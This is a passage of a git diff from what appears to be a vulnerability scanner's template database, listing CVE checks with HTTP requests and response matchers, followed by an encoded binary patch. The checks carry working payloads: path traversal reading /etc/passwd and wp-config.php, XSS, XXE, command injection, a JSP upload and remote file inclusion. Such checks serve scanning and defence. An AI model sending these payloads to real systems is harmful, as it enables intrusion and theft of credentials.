hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"path\"\n\n{{randstr}}.jsp\n-----------------------------24464570528145--\n","GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["ddbb3e76f92e78c445c8ecb392beb225"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16670","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/user/values.xml?var=STATUS"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["<values><variable><id>","Reader.STATUS"],"condition":"and"}]}]},{"id":"CVE-2018-12296","info":{"name":"Seagate NAS OS 4.3.15.1 - Server Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/external/7.0/system.System.get_infos HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["\"version\":","\"serial_number\":"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["\"version\": \"([0-9.]+)\""],"part":"body"}]}]},{"id":"CVE-2018-12675","info":{"name":"SV3C HD Camera L Series - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"word","part":"body","words":["<META http-equiv=\"Refresh\" content=\"0;URL=http://interact.sh\">"]}]}]},{"id":"CVE-2018-20470","info":{"name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7251","info":{"name":"Anchor CMS 0.12.3 - Error Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/anchor/errors.log"],"matchers":[{"type":"word","words":["\"date\":","\"message\":","\"trace\":["],"condition":"and"}]}]},{"id":"CVE-2018-16133","info":{"name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-20463","info":{"name":"WordPress JSmol2WP <=1.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_USER',","'DB_PASSWORD'"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7467","info":{"name":"AxxonSoft Axxon Next - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-1000861","info":{"name":"Jenkins - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["package#vulntest"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11473","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /users/registration HTTP/1.1\nHost: {{Hostname}}\n","POST /users/registration HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-12998","info":{"name":"Zoho manageengine - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16668","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/repository"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["** Platform sources **","** Application sources **"],"condition":"and"}]}]},{"id":"CVE-2018-14574","info":{"name":"Django - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//www.interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://www.interact.sh","Location: http://www.interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2018-10093","info":{"name":"AudioCode 420HD - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command.cgi?cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["admin:.*:*sh$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1207","info":{"name":"Dell iDRAC7/8 Devices - Remote Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"],"matchers":[{"type":"word","part":"response","words":["calling init: /lib/"]}]}]},{"id":"CVE-2018-8770","info":{"name":"Cobub Razor 0.8.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/generate.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ","/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000671","info":{"name":"Sympa version =>6.2.16 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email="],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-2392","info":{"name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /XMLCHART HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary={{randstr_1}}\n\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_2}}\"; filename=\"{{randstr_3}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <ChartData>\n      <Categories>\n        <Category>ALttP</Category>\n      </Categories>\n      <Series label=\"{{randstr_4}}\">\n        <Point>\n          <Value type=\"y\">12345</Value>\n        </Point>\n      </Series>\n    </ChartData>\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_5}}\"; filename=\"{{randstr_6}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <!DOCTYPE Extension [<!ENTITY xxe SYSTEM \"/etc/passwd\">]>\n    <SAPChartCustomizing version=\"1.1\">\n      <Elements>\n        <ChartElements>\n          <Title>\n            <Extension>&xxe;</Extension>\n          </Title>\n        </ChartElements>\n      </Elements>\n    </SAPChartCustomizing>\n--{{randstr_1}}--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Picture","Info","/output/"],"condition":"and"},{"type":"word","part":"body","words":["ImageMap","Errors"],"condition":"or"},{"type":"word","part":"header","words":["text/html","SAP Internet Graphics Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19915","info":{"name":"DomainMOD <=4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/host.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test\n","GET /assets/hosting.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2002-1131","info":{"name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search","{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search","{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4679","info":{"name":"Joomla! Portfolio Nexus - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1872","info":{"name":"Adobe Coldfusion <=8.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3318","info":{"name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5020","info":{"name":"AWStats < 6.95 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=interact.sh","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2009-5114","info":{"name":"WebGlimpse 2.18.7 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0347","info":{"name":"Autonomy Ultraseek - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs.html?url=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2009-0545","info":{"name":"ZeroShell <= 1.0beta11 Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2009-4223","info":{"name":"KR-Web <=1.1b2 - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1151","info":{"name":"PhpMyAdmin Scripts - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /scripts/setup.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2100","info":{"name":"Joomla! JoomlaPraise Projectfork  2.0.10 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1558","info":{"name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0932","info":{"name":"Horde/Horde Groupware - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4202","info":{"name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2015","info":{"name":"Joomla! MooFAQ 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3053","info":{"name":"Joomla! Agora 3.0.0b  - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1496","info":{"name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0114","info":{"name":"Microsoft FrontPage Extensions Check (shtml.dll)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_vti_inf.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["_vti_bin/shtml.dll"]},{"type":"status","status":[200]}]}]}]}
\ No newline at end of file
diff --git a/db/db.tar.zst b/db/db.tar.zst
index fd8d1f8db2db02b4244f187ead68ebf1b0ed056c..e33f9572fbde42dfad93b49bda1414bc99b0a12b 100644
GIT binary patch
delta 430403
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
